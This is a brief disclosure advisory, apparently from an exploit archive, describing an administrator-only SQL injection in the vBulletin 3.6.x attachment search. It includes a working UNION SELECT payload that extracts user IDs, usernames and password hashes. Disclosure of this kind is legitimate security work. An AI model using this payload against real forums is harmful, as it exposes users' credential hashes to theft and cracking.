/****************************************/ CREDIT: discovered by meto5757 and disfigure PRODUCT: vBulletin http://www.vbulletin.com/ VULNERABILITY: SQL Injection NOTES: - not a serious vulnerability, can only be used by administrator of site - SQL injection can be used to obtain password hash - tested on 3.6.4 and 3.6.5 POC: 1. Log in to admin panel 2. Go to Attachments->Search 3. Place the following string in the Attached Before field: ') union select 1,1,1,1,1,userid,password,1,username from user -- 9 greets: w4ck1ng.com /****************************************/
